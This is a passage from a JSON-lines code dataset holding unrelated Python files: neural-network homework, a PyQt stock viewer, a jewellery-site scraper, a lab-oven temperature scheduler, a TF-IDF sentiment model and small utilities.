main()\r\n","sub_path":"hypervisor_fact_reporting/hypervisor_facts.py","file_name":"hypervisor_facts.py","file_ext":"py","file_size_in_byte":4725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"538788885","text":"# -- coding: utf-8 --\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom testCases import *\nimport sklearn\nimport sklearn.datasets\nimport sklearn.linear_model\nfrom planar_utils import plot_decision_boundary, sigmoid, load_planar_dataset, load_extra_datasets\n\nX, Y = load_planar_dataset()\n\n\ndef show_datasets(X, Y):\n plt.title('flowers')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.scatter(X[0, :], X[1, :], c = Y, s = 40, cmap = plt.cm.Spectral)\n plt.show()\n\n\ndef layer_sizes(X, Y):\n n_x = X.shape[0]\n n_h = 4\n n_y = Y.shape[0]\n \n return (n_x, n_h, n_y)\n\n\ndef initialize_parameters(n_x, n_h, n_y):\n W1 = np.random.randn(n_h, n_x) * 0.01\n b1 = np.zeros((n_h, 1))\n W2 = np.random.randn(n_y, n_h) * 0.01\n b2 = np.zeros((n_y, 1))\n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n \n return parameters\n\n\ndef forward_propagation(X, parameters):\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n\n Z1 = np.dot(W1, X) + b1\n A1 = np.tanh(Z1)\n Z2 = np.dot(W2, A1) + b2\n A2 = sigmoid(Z2)\n\n cache = {\"Z1\": Z1,\n \"A1\": A1,\n \"Z2\": Z2,\n \"A2\": A2}\n \n return A2, cache\n\n\ndef compute_cost(A2, Y):\n m = Y.shape[1]\n logprobs = Y * np.log(A2) + (1 - Y) * np.log(1 - A2)\n cost = -np.sum(logprobs) / m\n cost = np.squeeze(cost) #去掉数组中为1的维度,得到的cost最后就是一个值\n \n return cost\n\n\ndef backward_propagation(parameters, cache, X, Y):\n m = X.shape[1]\n W1 = parameters[\"W1\"]\n W2 = parameters[\"W2\"]\n\n A1 = cache[\"A1\"]\n A2 = cache[\"A2\"]\n\n dZ2 = A2 - Y\n dW2 = np.dot(dZ2, A1.T) / m\n db2 = np.sum(dZ2, axis=1, keepdims=True) / m\n dZ1 = np.dot(W2.T, dZ2) * (1 - np.power(A1, 2))\n dW1 = np.dot(dZ1, X.T) / m\n db1 = np.sum(dZ1, axis=1, keepdims=True) /m\n\n grads = {\"dW1\": dW1,\n \"db1\": db1,\n \"dW2\": dW2,\n \"db2\": db2}\n \n return grads\n\n\ndef update_parameters(parameters, grads, learning_rate = 1.2):\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n\n dW1 = grads[\"dW1\"]\n db1 = grads[\"db1\"]\n dW2 = grads[\"dW2\"]\n db2 = grads[\"db2\"]\n\n W1 -= learning_rate * dW1\n b1 -= learning_rate * db1\n W2 -= learning_rate * dW2\n b2 -= learning_rate * db2\n\n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2}\n \n return parameters\n\n\ndef nn_model(X, Y, n_h, num_iterations = 10000, print_cost=False):\n n_x = layer_sizes(X, Y)[0]\n n_y = layer_sizes(X, Y)[2]\n\n parameters = initialize_parameters(n_x, n_h, n_y)\n W1 = parameters[\"W1\"]\n b1 = parameters[\"b1\"]\n W2 = parameters[\"W2\"]\n b2 = parameters[\"b2\"]\n\n for i in range(num_iterations):\n A2, cache = forward_propagation(X, parameters)\n cost = compute_cost(A2, Y)\n grads = backward_propagation(parameters, cache, X, Y)\n parameters = update_parameters(parameters, grads, learning_rate = 1.2)\n\n if print_cost and i % 1000 == 0:\n print (\"Cost after iteration %i: %f\" % (i, cost))\n \n return parameters\n\n\ndef predict(parameters, X):\n A2, cache = forward_propagation(X, parameters)\n predictions = np.around(A2) # 四舍五入,不用再使用loop\n\n return predictions\n\n\ndef accuracy():\n parameters = nn_model(X, Y, n_h = 4,\n num_iterations = 10000, \n print_cost = True)\n \n plot_decision_boundary(lambda 
x: predict(parameters, x.T), X, Y)\n plt.title(\"Decision Boundary for hidden layer size \" + str(4))\n plt.show()\n\n predictions = predict(parameters, X)\n accuracy = float((np.dot(Y, predictions.T) + \n np.dot(1 - Y,1 - predictions.T)) / float(Y.size) * 100)\n print ('Accuracy: %d' % accuracy + '%')\n return accuracy\n\n\n### test different hidden_layer_sizes\nplt.figure(figsize=(16, 32))\nhidden_layer_sizes = [1, 2, 3, 4, 5, 10, 20]\nfor i, n_h in enumerate(hidden_layer_sizes):\n plt.subplot(5, 2, i+1)\n plt.title('Hidden Layer of size %d' % n_h)\n parameters = nn_model(X, Y, n_h, num_iterations = 10000)\n plot_decision_boundary(lambda x: predict(parameters, x.T), X, Y)\n # plt.show()\n predictions = predict(parameters, X)\n accuracy = float((np.dot(Y,predictions.T) + np.dot(1-Y,1-predictions.T))/float(Y.size)*100)\n print (\"Accuracy for {} hidden units: {} %\".format(n_h, accuracy))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"assignment1-3/assignment1-3.py","file_name":"assignment1-3.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547671988","text":"import sys\nfrom matplotlib import style\nimport matplotlib.pyplot as plt\nfrom PyQt5.QtCore import QCoreApplication, pyqtSlot\nfrom PyQt5.QtGui import QIcon, QColor, QPainter\nfrom PyQt5.QtWidgets import QMessageBox, QAction, QApplication, QWidget, QPushButton, QMenuBar, QLineEdit, QFormLayout\nimport api_wrapper\n\nstyle.use('ggplot')\n\nclass MainWindow(QWidget):\n\n def __init__(self, x, y, width, height, title, icon=None):\n # Init for window\n super().__init__()\n self.setGeometry(x, y, width, height)\n self.setWindowTitle(title)\n if icon is not None:\n self.setWindowIcon(QIcon(icon))\n\n # Declare textboxes and menubar\n self.menubar = None\n self.api_box = None\n self.stock_box = None\n\n self.resp_data = None\n\n self.current_grabber = api_wrapper.TimeSeries()\n\n # Initialize the window elements\n self.init_menubar()\n self.init_textboxes()\n self.home()\n\n def init_menubar(self):\n # Create menubar buttons\n self.menubar = QMenuBar(self)\n file_menu = self.menubar.addMenu('&File')\n extract_action = QAction('&Quit', self)\n extract_action.setShortcut('Ctrl+W')\n extract_action.setStatusTip('Quit the app')\n extract_action.triggered.connect(QCoreApplication.instance().quit)\n file_menu.addAction(extract_action)\n about_menu = self.menubar.addMenu('&Help')\n extract_action = QAction('&About', self)\n about_menu.addAction(extract_action)\n\n def init_textboxes(self):\n button_layout = QFormLayout()\n\n self.api_box = QLineEdit(self)\n self.api_box.move(20, self.menubar.geometry().height()+20)\n self.api_box.resize(self.api_box.sizeHint())\n self.stock_box = QLineEdit(self)\n self.stock_box.move(\n 20,\n self.menubar.geometry().height()+40+self.api_box.geometry().height()\n )\n self.stock_box.resize(self.stock_box.sizeHint())\n\n btn = QPushButton('Fetch data', self)\n btn.clicked.connect(self.clicked)\n\n button_layout.addRow(\" \", None)\n button_layout.addRow(\"API Key\", self.api_box)\n button_layout.addRow(\"Stock Ticker\", self.stock_box)\n button_layout.addRow(btn)\n\n self.setLayout(button_layout)\n\n def home(self):\n btn = QPushButton('Quit', self)\n btn.clicked.connect(QCoreApplication.instance().quit)\n btn.resize(btn.sizeHint())\n btn.move(self.geometry().width()-btn.geometry().width(),\n self.geometry().height()-btn.geometry().height())\n self.show()\n\n @pyqtSlot()\n def 
clicked(self):\n \"\"\" activates when the fetch data button is clicked.\n\n todo:\n * elegant way to exclude certain columns in the result df\n \"\"\"\n self.current_grabber.set_api_key(self.api_box.text())\n try:\n self.resp_data = self.current_grabber.get_daily(self.stock_box.text())\n\n # Raise an exception if the received data is an error\n if isinstance(self.resp_data, dict):\n for key, val in self.resp_data.items():\n if 'Error' in key or 'Information' in key:\n raise api_wrapper.ResponseError(val)\n\n # Plot the data if it exists\n self.resp_data = self.resp_data.T\n exclude = ['5. volume']\n self.resp_data.loc[:, self.resp_data.columns.difference(exclude)].plot()\n plt.show()\n except api_wrapper.MissingApiKey:\n button_reply = QMessageBox.warning(self,\n 'Error',\n 'No API Key was provided',\n QMessageBox.Ok,\n QMessageBox.Ok)\n self.resp_data = None # reset the response data\n except api_wrapper.ResponseError as e:\n button_reply = QMessageBox.warning(self,\n 'Error',\n '{}'.format(e),\n QMessageBox.Ok,\n QMessageBox.Ok)\n self.resp_data = None # reset the response data\n\n\ndef run_gui(x, y, width, height, title, icon=None):\n app = QApplication(sys.argv)\n gui = MainWindow(x, y, width, height, title, icon)\n sys.exit(app.exec_())\n","sub_path":"src/window_elements/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":4477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"200703169","text":"# -*- coding: utf-8 -*-\n# author:lyh\n# datetime:2020/7/31 16:52\n\"\"\"\n88. Merge Sorted Array\n\nYou are given two sorted integer arrays nums1 and nums2. Merge nums2 into nums1 so that nums1 becomes one sorted array.\n\nNotes:\n\n The numbers of initialized elements in nums1 and nums2 are m and n, respectively.\n You may assume nums1 has enough space (a size greater than or equal to m + n) to hold the elements of nums2.\n\nExample:\n\nInput:\nnums1 = [1,2,3,0,0,0], m = 3\nnums2 = [2,5,6], n = 3\n\nOutput: [1,2,2,3,5,6]\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n m -= 1\n n -= 1\n for i in range(m + n + 1, -1, -1):\n if m >= 0 and n >= 0:\n if nums1[m] >= nums2[n]:\n nums1[i] = nums1[m]\n m -= 1\n else:\n nums1[i] = nums2[n]\n n -= 1\n elif n >= 0:\n nums1[i] = nums2[n]\n n -= 1\n else:\n break\n\n\nif __name__ == '__main__':\n nums1 = [1, 2, 3, 0, 0, 0]\n nums2 = [2, 5, 6]\n Solution().merge(nums1, 3, nums2, 3)\n print(nums1)\n","sub_path":"Solutions/0088.merge.easy.py","file_name":"0088.merge.easy.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"535302781","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport numpy as np\nimport datetime\nimport config \nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import roc_auc_score\n\nFLAGS = tf.app.flags.FLAGS\n\ndata = np.load(FLAGS.data_dir)\nbatches = np.load(FLAGS.batches_dir)\nQ = np.load(FLAGS.Q_dir)\nQ_idx = np.load(FLAGS.Q_idx_dir)\n\nsample_indicator = np.load(FLAGS.sample_indicator_dir)\n\ndegree_of_freedom = np.load(FLAGS.degree_of_freedom_dir)\n\nrefined_sample_indicator = None \n#np.load(FLAGS.refined_sample_indicator_dir)\nrefined_shift_indicator = None \n#np.load(FLAGS.refined_shift_indicator_dir)\n\n_features = data\n_mean = np.mean(_features, axis=0)\n_std = np.std(_features, axis=0)\n#print(\"means:\", _mean)\n#print(\"stds:\", _std)\n\ndef get_data():\n return data, batches\n\ndef get_xrd_mat():\n return 
data[:,FLAGS.feature_dim:]\n\ndef get_comp():\n return data[:,:FLAGS.feature_dim]\n\ndef get_weights_sol():\n return np.load(FLAGS.weights_sol_dir)\n\ndef get_bases_sol():\n return np.load(FLAGS.bases_sol_dir)\n\ndef get_decomposition_sol():\n return np.load(FLAGS.decomposition_sol_dir)\n\ndef get_feature(data, my_order, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n output = []\n if offset is None:\n offset = 0\n \n for i in my_order:\n x = data[i][offset:offset + FLAGS.feature_dim]\n #x = (x - _mean)/_std\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_xrd(data, my_order, offset = None):\n # we use max-normalization\n output = []\n if offset is None:\n offset = FLAGS.feature_dim\n \n for i in my_order:\n x = data[i][offset:offset + FLAGS.xrd_dim]\n x = x[Q_idx]\n #x = x /(np.max(x) + FLAGS.eps)\n #x * FLAGS.peak_rescale #/(np.max(x) + 1e-9)\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_indicator(my_order, flag = 0, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n output = []\n rand_I = np.random.randint(2, size = FLAGS.n_bases + FLAGS.n_new_bases)\n for i in my_order:\n v = flag \n x = np.concatenate([sample_indicator[i][:FLAGS.n_bases], np.zeros(FLAGS.n_new_bases) + v])\n\n if (FLAGS.rand_I == 1):\n x *= rand_I\n #x = (x - _mean)/_std\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_refined_sample_indicator(my_order, version = 1, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n global refined_sample_indicator\n if refined_sample_indicator is None:\n refined_sample_indicator = np.load(FLAGS.refined_sample_indicator_dir)\n\n output = []\n \n for i in my_order:\n if (version == 1):\n x = refined_sample_indicator[i][:FLAGS.n_bases + FLAGS.n_new_bases]\n #x = (x - _mean)/_std\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_refined_shift_indicator(my_order, version = 1, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n global refined_shift_indicator\n if refined_shift_indicator is None:\n refined_shift_indicator = np.load(FLAGS.refined_shift_indicator_dir)\n output = []\n \n for i in my_order:\n if (version == 1):\n x = refined_shift_indicator[i]\n #x = (x - _mean)/_std\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output\n\ndef get_degree_of_freedom(my_order, offset = None):\n # we use (x - mean(x))/stderr as the normalization\n # we remove the lattice parameters and G6\n output = []\n \n for i in my_order:\n x = degree_of_freedom[i]\n output.append(x)\n\n output = np.array(output, dtype=\"float32\") \n return output \n#####################################################################\n","sub_path":"Crystal-Structure-Phase-Mapping/Li-Sr-Al-powder-lib-38-50--fullQ-solu/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":4150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"101364119","text":"from bs4 import BeautifulSoup as bs\nfrom multiprocessing import Pool\nfrom threading import Thread\nfrom concurrent import futures\nimport requests\nimport re\nimport os\n\"\"\"\nThe goal is to end up with a photo of each matching ring in the project\ndirectory, named articul[number].\n\nWhat needs to be done:\n1 - open the link of every ring listed on a catalog page;\n\n2 - grab the needed information (price, size); if it matches the criteria,\nsave the photo (with the article number in the name), otherwise keep searching;\n\n3 - repeat this every time until a 404 error is hit - the pages have run out.\n\n* Try to make the program multithreaded *\n\"\"\"\n\n\ndef information_about_ring(ring_url):\n try:\n ring_info = bs(requests.get(ring_url).content, 'html.parser')\n price = ring_info.find('span', attrs={\"class\": 'price'})['data-detail-price']\n article = ring_info.find('div', class_='product-article').string.strip().split(' ')[1]\n sizes = ring_info.findAll('button', {'class': 'size'})\n sizes = [float(i['data-size']) for i in sizes]\n image_url = ring_info.find('picture', attrs={'itemprop': 'image'})\n template = re.compile('https://+.*sokolov.*jpg')\n image_url = re.findall(template, str(image_url))[0]\n return price, article, sizes, image_url\n except: pass\n\n\ndef download_img(image_url, filename):\n img = requests.get(image_url)\n with open(r'F:\\py_Project\\SuddenlyNeeded\\jewelry\\ '.rstrip() + '{}.png'.format(filename), 'wb') as f:\n f.write(img.content)\n\n\ndef sort_rings(information_about_ring):\n price = float(information_about_ring[0])\n name = str(information_about_ring[1])\n necessary_size = list(filter(lambda x: x == 15.5, information_about_ring[2]))\n url = information_about_ring[3]\n if price < 3000 and necessary_size:\n download_img(url, name)\n print('All good!')\n\n\ndef informations_from_page(page_url):\n page_info = bs(requests.get(page_url).content, 'html.parser')\n rings = page_info.findAll('meta', attrs={'itemprop': 'sku'})\n template = 'https://sokolov.ru/jewelry-catalog/product/{}'\n rings_article = [template.format(ring['content']) for ring in rings]\n\n return rings_article\n\n\ndef make_all(ring):\n info = information_about_ring(ring)\n sort_rings(info)\n\n#start_ring_url = 'https://sokolov.ru/jewelry-catalog/product/94012455/'\n\nif __name__ == '__main__':\n for i in range(1, 52):\n page_url = 'https://sokolov.ru/jewelry-catalog/rings/silver/?page={}'.format(i)\n rings_article = informations_from_page(page_url)\n with futures.ThreadPoolExecutor(5) as executor:\n res = executor.map(make_all,rings_article )\n print(i)\n\n print('Finish!')","sub_path":"gift/rings_parser/rings_parse.py","file_name":"rings_parse.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"653738878","text":"TC = int(input()) \nans = []\nfor tc in range(1, TC + 1):\n k = \"#\"+str(tc) + \" \"\n N = int(input())\n lst = list(map(int, input().strip().split()))\n s = sum(lst) / len(lst)\n count = 0\n for e in lst:\n if e <= s:\n count += 1\n k += str(count)\n ans.append(k)\nfor e in ans:\n print(e)","sub_path":"SW-10505.py","file_name":"SW-10505.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"15106079","text":"\"\"\"\nExtract pouch volume\n\"\"\"\n\nimport skimage.io as io\nimport matplotlib.pyplot as plt\nfrom skimage.measure import regionprops\nimport numpy as np\n\n# import nucleo_segment classes\nfrom storage.image import ImageHandler\nfrom processing.image import ImageProcessing\nfrom frontend.figures.plot import Plot\n\n# define directories\nwork_dir = '/Users/schiend/Desktop/Drive/Experiments/Carles/'\n\n# load image - Z, C, Y, X\npouch_img = io.imread(\n work_dir + 
'vgQE-dsRed_mLamin-A488_wL3-L2_late_sync_25C.lif - Series066.tif'\n)\n\n# reorder axes - C, Z, Y, X\npouch_stack = pouch_img.swapaxes(0, 1)[0, 20:21:1, :, :]\n\nprocessing_steps = [\n ['EQU'],\n ['THR', 'OTSU', 100, 'no3D'], # checked\n ['MED', 1],\n ['ERO', 'bin', 5], # checked\n ['FILL'],\n ['OPN', 'bin', 2],\n ['CONV_BIT', 16, '3D'],\n ['LABEL', 1, 'no3D']\n]\n\ncheck_params = True\ndo_post_process = False\n\nresults_titles = list()\nresults_titles.append('Original')\npouch_volumes = list()\n\nif check_params is True:\n for i in range(10, 21, 1):\n processing_steps[5][2] = i\n pouch_volumes.append(ImageProcessing.apply_filters(processing_steps, pouch_stack, verbose=True))\n results_titles.append('OPN %i' % i)\nelse:\n pouch_volumes.append(ImageProcessing.apply_filters(processing_steps, pouch_stack, verbose=True))\n results_titles.append('Processed')\n\nif do_post_process is True:\n # go through labels and filter small ones\n pouch_volume_filtered = np.zeros_like(pouch_volumes[0])\n union_pouch_volume = np.zeros_like(pouch_volumes[0])\n dilate_step = [\n ['DIL', 'bin', 50]\n ]\n\n for z in range(0, pouch_volumes[0].shape[0]):\n print('get props for z: %i' % z)\n\n z_props = regionprops(pouch_volumes[0][z])\n\n # a list of dilated images\n dilated_imgs = list()\n\n # go through and filter by size\n for props in z_props:\n if props['area'] > 1000:\n # add to image\n dilated_imgs.append(np.zeros_like(union_pouch_volume[z]))\n\n for i, coords in enumerate(props['coords']):\n pouch_volume_filtered[z][int(coords[0]), int(coords[1])] = 1\n dilated_imgs[-1][int(coords[0]), int(coords[1])] = 1\n\n # dilate\n dilated_imgs[-1] = ImageProcessing.apply_filters(dilate_step, dilated_imgs[-1], verbose=True)\n\n print('calc union for %i dilated images' % len(dilated_imgs))\n\n # go through all dilated images and add union\n for o, dilated_outer in enumerate(dilated_imgs):\n for i, dilated_inner in enumerate(dilated_imgs):\n if o != i:\n union_pouch_volume[z] += np.logical_and(dilated_outer, dilated_inner)\n\n # add filtered and union to results\n pouch_volumes.append(pouch_volume_filtered)\n results_titles.append('Filtered')\n\n pouch_volumes.append(union_pouch_volume)\n results_titles.append('Union')\n\n # add union to filtered\n pouch_volume_final = pouch_volume_filtered + union_pouch_volume\n pouch_volume_final[pouch_volume_final > 1] = 1\n\n final_steps = [\n ['CLS', 'bin', 20],\n ['FILL']\n ]\n\n #for i in range(20, 41, 5):\n # final_steps[0][2] = i\n # pouch_volumes.append(ImageProcessing.apply_filters(final_steps, pouch_volume_final, verbose=True))\n # results_titles.append('CLS %i' % i)\n\n pouch_volume_final = ImageProcessing.apply_filters(final_steps, pouch_volume_final, verbose=True)\n pouch_volumes.append(pouch_volume_final)\n results_titles.append('Final')\n\n# show images\nstack_fig = plt.figure(figsize=(20, 10))\n\n# view the stack and the processing results\nresults = list()\n\nresults.append(pouch_stack)\n\nfor pouch_volume in pouch_volumes:\n results.append(pouch_volume)\n\nPlot.show_stacks(stack_fig, results, range(0, 1, 1), img_title=results_titles)\n\n#ImageHandler.save_stack_as_tiff(pouch_volume, work_dir + 'pouch_volume.tif')\n","sub_path":"playground/pouch_cross_r0.py","file_name":"pouch_cross_r0.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"311557522","text":"import re\nimport pandas as pd\nimport numpy as np\nfrom nltk.corpus import stopwords\nfrom bs4 import 
BeautifulSoup\nfrom gensim.models import Word2Vec\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.feature_extraction.text import TfidfVectorizer as TFIDF\n\ntrain = pd.read_csv(\"./input/labeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\ntest = pd.read_csv(\"./input/testData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\nunlabeled_train = pd.read_csv(\"./input/unlabeledTrainData.tsv\", header=0, delimiter=\"\\t\", quoting=3)\n\ndef review_to_words(raw_review):\n review_text = BeautifulSoup(raw_review, \"lxml\").get_text() \n letters_only = re.sub(\"[^a-zA-Z]\", \" \", review_text) \n words = letters_only.lower().split() \n stops = set(stopwords.words(\"english\")) \n meaningful_words = [w for w in words if not w in stops] \n return( \" \".join(meaningful_words))\n\nlabel = train['sentiment']\nclean_train_reviews = []\nnum_reviews = train[\"review\"].size\n\n\nfor i in range(0, num_reviews):\n if( (i+1)%1000 == 0 ):\n print(\"Review %d of %d\\n\" % (i+1, num_reviews))\n clean_train_reviews.append(review_to_words(train[\"review\"][i]))\n\nclean_test_reviews = [] \n\nfor i in range(0,num_reviews):\n if( (i+1) % 1000 == 0 ):\n print(\"Review %d of %d\\n\" % (i+1, num_reviews))\n clean_review = review_to_words(test[\"review\"][i])\n clean_test_reviews.append(clean_review)\n\ntfidf = TFIDF(min_df=2, # 最小支持度为2\n max_features=None,\n strip_accents='unicode',\n analyzer='word',\n token_pattern=r'\\w{1,}',\n ngram_range=(1, 3), # 二元文法模型\n use_idf=1,\n smooth_idf=1,\n sublinear_tf=1,\n stop_words = 'english')\n\n# 合并训练和测试集以便进行TFIDF向量化操作\ndata_all = clean_train_reviews + clean_test_reviews\nlen_train = len(clean_train_reviews)\n\ntfidf.fit(data_all)\ndata_all = tfidf.transform(data_all)\n# 恢复成训练集和测试集部分\ntrain_x = data_all[:len_train]\ntest_x = data_all[len_train:]\nprint('TF-IDF处理结束.')\n\nfrom sklearn.linear_model import LogisticRegression as LR\nfrom sklearn.grid_search import GridSearchCV\n\n# 设定grid search的参数\ngrid_values = {'C':[30]} \n# 设定打分为roc_auc\nmodel_LR = GridSearchCV(LR(penalty='l2', dual = True, random_state = 0), grid_values, scoring = 'roc_auc', cv = 20)\nmodel_LR.fit(train_x, label)\n\nGridSearchCV(cv=20, estimator=LR(C=1.0, class_weight=None, dual=True,\n fit_intercept=True, intercept_scaling=1, penalty='L2', random_state=0, tol=0.0001),\n fit_params={}, iid=True, n_jobs=1,\n param_grid={'C': [30]}, pre_dispatch='2*n_jobs', refit=True,\n scoring='roc_auc', verbose=0)\n#输出结果\nprint(model_LR.grid_scores_)\n\ntest_predicted = np.array(model_LR.predict(test_x))\nprint('保存结果...')\noutput = pd.DataFrame(data={\"id\":test[\"id\"], \"sentiment\":test_predicted})\noutput.to_csv('lr_output.csv', index=False, quoting=3)\nprint('结束.')","sub_path":"bag/lesson5.py","file_name":"lesson5.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214274662","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 7 09:23:24 2019\n\n@author: USUARIO\n\"\"\"\n\nimport re\nimport requests \nimport datetime\nfrom memmertTemporizador import RepeatedTimer as RPT\nfrom time import sleep\n\nDEBUG=True #True Simulate Only False Run\n \ndef dataMiner(URL,file):\n r = requests.get(URL)\n data = r.text\n dataArray=re.split(': |,',data)\n dateTimeObj=datetime.datetime.now()\n timestampStr = dateTimeObj.strftime(\"%d/%m/%Y %H:%M:%S.%f\")\n textDoc = open(file,'a')\n textDoc.write(\"%s %s\\n\"%(timestampStr,dataArray[1]))\n textDoc.close()\n print(dataArray[1])\n 
\r\n#------------------------------------------------------------------------------\r\nif(DEBUG): URL = \"https://20dicprueba.github.io/temp.html\"\r\nif(DEBUG==False): URL = \"http://192.168.100.100/atmoweb?Temp1Read=\"\r\nfile = \"pruebaGuardado.txt\"\r\n#------------------------------------------------------------------------------\r\n\r\nprint( \"starting...\")\r\nrt = RPT(1, dataMiner,URL,file) # it auto-starts, no need of rt.start()\r\n\r\ntry:\r\n \r\n timestop = 120*60\r\n timestop1 = 240*60\r\n timestop2 = 180*60\r\n \r\n# #Set the first temperature\r\n# print(\"30 degrees Celsius\")\r\n# if(DEBUG): print (\"dummy 30\")\r\n# URLA = \"http://192.168.100.100/atmoweb?TempSet=30\" \r\n# if(DEBUG==False): r = requests.get(URLA)\r\n# sleep(timestop)\r\n#------------------------------------------------------------------------------ \r\n #Set the first temperature\r\n# print(\"25 degrees Celsius\")\r\n# if(DEBUG): print (\"dummy 25\")\r\n# URLA = \"http://192.168.100.100/atmoweb?TempSet=25\" \r\n# if(DEBUG==False): r = requests.get(URLA)\r\n# #sleep(timestop)\r\n# sleep(timestop1)\r\n \r\n #Set the second temperature\r\n print(\"30 degrees Celsius\")\r\n if(DEBUG): print (\"dummy 30\")\r\n URLA = \"http://192.168.100.100/atmoweb?TempSet=30\" \r\n if(DEBUG==False): r = requests.get(URLA)\r\n #sleep(timestop)\r\n sleep(timestop2)\r\n \r\n #Set the third temperature\r\n print(\"40 degrees Celsius\")\r\n if(DEBUG): print (\"dummy 40\")\r\n URLA = \"http://192.168.100.100/atmoweb?TempSet=40\" \r\n if(DEBUG==False): r = requests.get(URLA)\r\n sleep(timestop)\r\n \r\n #Set the fourth temperature\r\n print(\"50 degrees Celsius\")\r\n if(DEBUG): print (\"dummy 50\")\r\n URLA = \"http://192.168.100.100/atmoweb?TempSet=50\" \r\n if(DEBUG==False): r = requests.get(URLA)\r\n sleep(timestop)\r\n \r\n #Set the fifth temperature\r\n print(\"60 degrees Celsius\")\r\n if(DEBUG): print (\"dummy 60\")\r\n URLA = \"http://192.168.100.100/atmoweb?TempSet=60\" \r\n if(DEBUG==False): r = requests.get(URLA)\r\n sleep(timestop)\r\n \r\n #Set the sixth temperature\r\n print(\"70 degrees Celsius\")\r\n if(DEBUG): print (\"dummy 70\")\r\n URLA = \"http://192.168.100.100/atmoweb?TempSet=70\" \r\n if(DEBUG==False): r = requests.get(URLA)\r\n sleep(timestop)\r\n \r\n #Set the seventh temperature\r\n print(\"80 degrees Celsius\")\r\n if(DEBUG): print (\"dummy 80\")\r\n URLA = \"http://192.168.100.100/atmoweb?TempSet=80\" \r\n if(DEBUG==False): r = requests.get(URLA)\r\n sleep(timestop)\r\n \r\n #Set the eighth temperature\r\n print(\"90 degrees Celsius\")\r\n if(DEBUG): print (\"dummy 90\")\r\n URLA = \"http://192.168.100.100/atmoweb?TempSet=90\" \r\n if(DEBUG==False): r = requests.get(URLA)\r\n sleep(timestop)\r\n \r\n print(\"20 degrees Celsius\")\r\n if(DEBUG): print (\"dummy 20\")\r\n URLA = \"http://192.168.100.100/atmoweb?TempSet=20\" \r\n if(DEBUG==False): r = requests.get(URLA)\r\n \r\nexcept KeyboardInterrupt:\r\n print(\"Something went wrong\")\r\n \r\nfinally:\r\n rt.stop()\r\n ","sub_path":"HornoMemmert/version3/arreglo.py","file_name":"arreglo.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"484562903","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDependency topology helper.\n\"\"\"\n\nimport argparse\nimport functools\nimport sys\nimport re\nimport os\n\nimport networkx as nx\n\nINSTALLER = 'install.sh'\nRE_DEPENDS = re.compile(r'^.*#\\s*depends-on\\s*:(?P<names>.*)$')\nRE_SATISFIES = re.compile(r'^.*#\\s*satisfies\\s*:(?P<names>.*)$')\n\ndef read_dependencies(filename):\n \"\"\"Find dependency or satisfying 
